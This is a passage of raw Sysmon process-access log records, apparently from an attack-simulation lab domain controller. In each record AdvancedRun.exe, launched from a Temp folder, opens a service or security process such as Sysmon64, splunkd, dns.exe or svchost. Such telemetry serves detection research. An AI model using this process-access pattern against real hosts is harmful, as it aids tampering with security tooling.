Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.201{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.200{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.200{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.199{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077172Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.199{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077171Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077170Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077169Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077168Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077167Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.198{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077166Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077165Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077164Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077163Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.197{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077162Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077161Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.196{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
